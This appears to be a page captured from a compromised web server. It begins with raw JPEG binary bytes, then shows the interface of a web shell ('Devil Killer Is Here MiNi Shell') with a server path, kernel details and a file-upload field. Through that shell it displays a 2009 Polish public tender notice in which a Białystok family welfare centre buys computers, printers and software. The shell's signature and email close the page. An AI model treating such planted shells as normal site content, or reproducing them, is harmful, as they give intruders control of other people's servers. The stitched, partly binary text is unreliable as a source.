JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090320/52689-N-2009.html

<p class="kh_header"><b>Białystok: Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, akcesoriami oraz drukarkami do Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku</b><br>
<b>Numer ogłoszenia: 52689 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku , ul. Malmeda 8, 15-440 Białystok, woj. podlaskie, tel. 0-85 678 31 03, faks 0-85 678 31 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www. mopr.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem, akcesoriami oraz drukarkami do Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup i dostawa sprzętu komputerowego wraz z oprogramowaniem i akcesoriami, oraz drukarkami i materiałami eksploatacyjnymi (tonerami) do tych drukarek do Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku, w następującym zakresie:
a) zestaw komputerowy: 
           - jednostka centralna  -  28 sztuk  (tego samego producenta i modelu),
          - monitor   - 28 sztuk (tego samego producenta i modelu),
          -  zasilacz awaryjny UPS  - 28 sztuk (tego samego producenta i modelu),
b) drukarka sieciowa z duplexem  - 5 sztuk (tego samego producenta i modelu),
c) drukarka sieciowa  - 10 sztuk (tego samego producenta i modelu),
d) notebook - sztuk 2,
e) switch 16 portowy  - 15 sztuk (tego samego producenta i modelu),
f) switch 48 portowy - 1 sztuka,
g) skaner  - 1 sztuka,
h) pakiet  programów biurowych MS Office Standard 2007 /26 użytkowników -  1 licencja,
i) ) pakiet programów biurowych MS Office Professional 2007-OEM - 2 licencje,
j) pakiet programów biurowych MS Office Basic 2007 -OEM - 2 licencje,
k) program antywirusowy  NOD32 - 3 letnia subskrypcja / 30 użytkowników - 1 licencja,
l) tonery do drukarek - sztuk/kpl  75 ( po 5 sztuk/kpl do każdej zaoferowanej drukarki).
2. Szczegółowe wymagania techniczne określone zostały w załączniku nr 1 do niniejszej specyfikacji istotnych warunków zamówienia - Szczegółowy opis przedmiotu zamówienia.
3. Oferowany przedmiot zamówienia musi odpowiadać wymaganiom określonym przez Zamawiającego, zgodnie ze szczegółowym opisem przedmiotu zamówienia, musi być fabrycznie nowy, do wytworzenia którego zastosowano wcześniej nieużywane części i materiały, wolny od wad technicznych i prawnych, dopuszczony do obrotu, kompletny, zapakowany w oryginalne opakowania posiadające zabezpieczenia pozwalające na prawidłowe przechowywanie i bezpieczny transport, z podaną nazwą producenta i wskazaniem terminu upływu gwarancji producenta.

Sprzęt będący przedmiotem zamówienia musi być fabrycznie nowy, wyprodukowany nie wcześniej niż 12  miesięcy od daty przekazania do użytkowania Zamawiającemu.

4. Oferowane urządzenia muszą spełniać wszelkie obowiązujące w Polsce wymagania dla tego typu 
sprzętu, w szczególności określone w Rozporządzeniu Ministra Gospodarki z dnia 27 marca 2007r. w sprawie szczegółowych wymagań ograniczenia wykorzystywania w sprzęcie elektronicznym i elektrycznym niektórych substancji mogących negatywnie oddziaływać na środowisko (Dz. U. Nr 69, poz. 457),muszą posiadać oznakowanie CE oraz deklarację zgodności wystawioną przez producenta sprzętu zgodnie z aktualnie obowiązującymi przepisami (należy przez to rozumieć oświadczenie producenta lub jego upoważnionego przedstawiciela, stwierdzające na jego wyłączną odpowiedzialność, że oferowany sprzęt jest zgodny z zasadniczymi wymaganiami, zgodnie z postanowieniami Ustawy z dnia 30 sierpnia 2002 roku o systemie oceny zgodności (Dz. U z  2004r., Nr 204, poz. 2087 z późn. zm.). - oświadczenie Wykonawcy na formularzu ofertowym.
Dokumenty wystawione w języku obcym muszą być przetłumaczone i podpisane przez Wykonawcę.

5. Oferowany sprzęt i oprogramowanie musi posiadać szczegółowe instrukcje obsługi i konserwacji, nośniki, kody, sterowniki i programy konieczne do konfigurowania, uruchamiania oraz wykorzystania części i podzespołów komputera oraz karty katalogowe producenta i karty gwarancyjne w języku polskim, licencje, certyfikaty i deklaracje zgodności.

6. Pod pojęciem oryginalnych materiałów eksploatacyjnych (tonerów) należy rozumieć: materiały fabrycznie nowe, wyprodukowane przez producenta drukarek nie wcześniej niż 12 miesięcy przed datą dostawy do Zamawiającego, do których przeznaczone są oferowane materiały, nieregenerowane, w oryginalnych opakowaniach i opatrzone jego zastrzeżonym znakiem towarowym, o jakości i parametrach akceptowanych (dopuszczonych do użytku) przez producenta drukarek.

7. Zamawiający dopuszcza rozwiązania równoważne do asortymentu, który opisano w załączniku nr 1 do  SIWZ za pomocą nazw handlowych. 
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, obowiązany jest wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.

8. W takim przypadku Wykonawca musi podać w Formularzu oferty: nazwę producenta, oznaczenie modelu, oraz parametry techniczne oferowanego produktu, a w przypadku materiałów eksploatacyjnych (tonerów) dołączyć do oferty zaświadczenie producenta lub autoryzowanego dystrybutora drukarek, do których przeznaczone są oferowane równoważne materiały eksploatacyjne (tonery), o możliwości bezpiecznego zastosowania ich w miejsce oryginalnych materiałów eksploatacyjnych.

9. W przypadku oferowania sprzętu i materiałów równoważnych za równoważne Zamawiający uzna:
a) w przypadku sprzętu: sprzęt nowy, odpowiadający opisowi Zamawiającego, o parametrach technicznych, cechach jakościowych i użytkowych nie gorszych niż wymagane w załączniku nr 1 do niniejszej specyfikacji,
b) w przypadku materiałów eksploatacyjnych (tonerów):
- materiały nowe, 
- wyprodukowane przez innego producenta niż producent urządzenia do którego są przeznaczone, nie wcześniej  
  niż 12 miesięcy przed datą dostawy do Zamawiającego, 
- nieregenerowane,
- nie poddane procesowi ponownego napełniania oraz wymiany jakichkolwiek elementów,
- zastosowanie ich nie może powodować utraty gwarancji producenta urządzenia.

10. Równoważne materiały eksploatacyjne (tonery) muszą spełniać następujące warunki:
a) muszą być kompatybilne ze wskazanym typem drukarki,
b) muszą posiadać parametry techniczne, jakościowe, funkcjonalne oraz użytkowe, w szczególności parametry jakości wydruku i wydajności nie mniejsze niż oryginalne oferowane przez producentów zaoferowanych drukarek - oświadczenie Wykonawcy na formularzu ofertowym,
c) muszą zapewnić prawidłową eksploatację drukarek, a ich zastosowanie nie może powodować uszkodzenia drukarek lub ograniczenia funkcji i możliwości urządzenia oraz jakości wydruku wyspecyfikowanych w warunkach technicznych producenta drukarek.
11. Dodatkowe warunki dotyczące przedmiotu zamówienia:

a) Termin płatności: 30 dni od daty doręczenia Zamawiającemu faktury,
b) Nie przewiduje się wypłacania zaliczek na poczet wykonania zamówienia,
c) Forma zapłaty - jak we wzorze umowy - załącznik nr 6 do specyfikacji istotnych warunków zamówienia,
d) Przedmiot zamówienia będzie dostarczony do miejsca siedziby Zamawiającego nie później niż w terminie, o którym mowa w pkt. 4 specyfikacji istotnych warunków zamówienia, na koszt Wykonawcy,
e) Przekazanie przedmiotu umowy nastąpi w siedzibie Zamawiającego i potwierdzone zostanie protokołem zdawczo-odbiorczym podpisanym przez obie strony,
f) Wykonawca zapewni nieodpłatny serwis gwarancyjny świadczony w miejscu instalacji sprzętu lub u Wykonawcy z transportem na jego koszt,  
g) Wykonawca udzieli gwarancji na oferowany przedmiot zamówienia:
- jednostka centralna - minimum 36 miesięcy od daty przekazania przedmiotu umowy do użytkowania  Zamawiającemu,
- monitor- minimum 36 miesięcy od daty przekazania przedmiotu umowy do użytkowania  Zmawiającemu,
- zasilacze awaryjne (UPS)  - minimum 24 miesiące od daty przekazania przedmiotu umowy do użytkowania  Zamawiającemu,
- drukarki sieciowe -  minimum 12 miesięcy od daty przekazania przedmiotu umowy do   użytkowania Zamawiającemu,
- notebook A  - minimum 24 miesiące od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu,
- notebook B  - minimum 24 miesiące od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu,
- switch 16 portowy - minimum 36 miesięcy od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu,
- switch 48 portowy - minimum 36 miesięcy od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu,
- skaner  - minimum 12 miesięcy od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu,
- tonery do drukarek - minimum 12 miesięcy od daty przekazania przedmiotu umowy do użytkowania Zamawiającemu.

h) Wykonawca wskaże w ofercie ( oświadczenie na formularzu oferty) część zamówienia, której wykonanie zamierza powierzyć podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.21.30.00-5, 30.21.31.00-6, 30.23.00.00-0, 30.23.21.10-8, 30.23.72.00-1, 48.00.00.00-8, 30.12.51.10-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O zamówienie mogą ubiegać się Wykonawcy, którzy:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,     
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności wymaga się od Wykonawców aby:

- wykazali i udokumentowali wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawy odpowiadającej swoim rodzajem i wartością (nie mniejszej niż 50 000,00 zł brutto każda) dostawie stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu załączyć należy dokumenty potwierdzające, że dostawy te zostały wykonane należycie,
        - wykazali i udokumentowali spełnienie wymogów jakościowych w zakresie dostaw będących przedmiotem zamówienia,

b)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
c)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).
2. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 9 specyfikacji istotnych warunków zamówienia.
3. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
a)Wykonawcy przedłożą wraz z ofertą pełnomocnictwo wszystkich stron (wymaga się solidarnej odpowiedzialności Wykonawców),
b)w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców występujących wspólnie oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 pkt 1-9 oraz spełnia warunki określone w art. 22 Ustawy Prawo zamówień publicznych, a także składa w imieniu własnej firmy dokumenty i oświadczenia wymienione w pkt. 9.1lit.:a,b,e specyfikacji istotnych warunków zamówienia. 
c)oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie,
d)Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
e)wypełniając formularz oferty, jak również inne dokumenty powołujące się na Wykonawcę; w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące wszystkich Wykonawców występujących wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy mają dostarczyć:
a) aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, [wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert],
b) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy,  oraz że nie podlega wykluczeniu z postępowania na podstawie art. 24  ustawy - załącznik nr 4 do specyfikacji istotnych warunków zamówienia, 
c) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawy odpowiadającej swoim rodzajem i wartością (nie mniejszej niż 50 000,00 zł brutto każda) dostawie stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu załączyć należy dokumenty potwierdzające, że dostawy te zostały wykonane należycie - załącznik nr 5 do specyfikacji istotnych warunków zamówienia, 
d) pełnomocnictwo podmiotów występujących wspólnie (np. konsorcjum),
e) stosowne pełnomocnictwo, jeżeli upoważnienie do złożenia oferty nie wynika z dokumentów wymienionych w punkcie 9.1. lit.a) specyfikacji i jeżeli ofertę składa pełnomocnik,
f) zaświadczenie producenta lub autoryzowanego dystrybutora drukarek, do których przeznaczone są oferowane równoważne materiały eksploatacyjne (tonery), o możliwości bezpiecznego zastosowania ich w miejsce oryginalnych materiałów eksploatacyjnych ( tonery)  - jeżeli dotyczy,
g) zaświadczenie podmiotu uprawnionego do kontroli jakości lub równoważne, potwierdzające, że oferowane równoważne materiały eksploatacyjne (tonery) odpowiadają określonym normom lub specyfikacjom technicznym (np. certyfikaty jakości, deklaracje wydajności) - jeżeli dotyczy. 
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w punkcie 7.2. lit.a, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto wobec niego likwidacji ani nie ogłoszono upadłości, nie orzeczono wobec niego zakazu ubiegania się o zamówienie, nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczeniem lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu. 
Dokument, o których mowa w punkcie 7.2.lit.a, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Dokumenty sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.

3. Dokumenty mogą być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub upełnomocnionego przedstawiciela Wykonawcy. W przypadku złożenia dokumentu w formie kopii każda strona dokumentu musi być opatrzona klauzulą: Za zgodność z oryginałem.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
4. Brak jakiegokolwiek z wyżej wymienionych dokumentów spowoduje wykluczenie Wykonawcy z postępowania, z zastrzeżeniem art. 26 ust. 3 ustawy.

5.Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania a ofertę uznaje się za odrzuconą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www. mopr.bialystok.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-404 Białystok, woj. podlaskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2009 godzina 09:45, miejsce: sekretariat w siedzibie Zamawiającego, ul. Malmeda 8, 15-404 Białystok, woj. podlaskie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com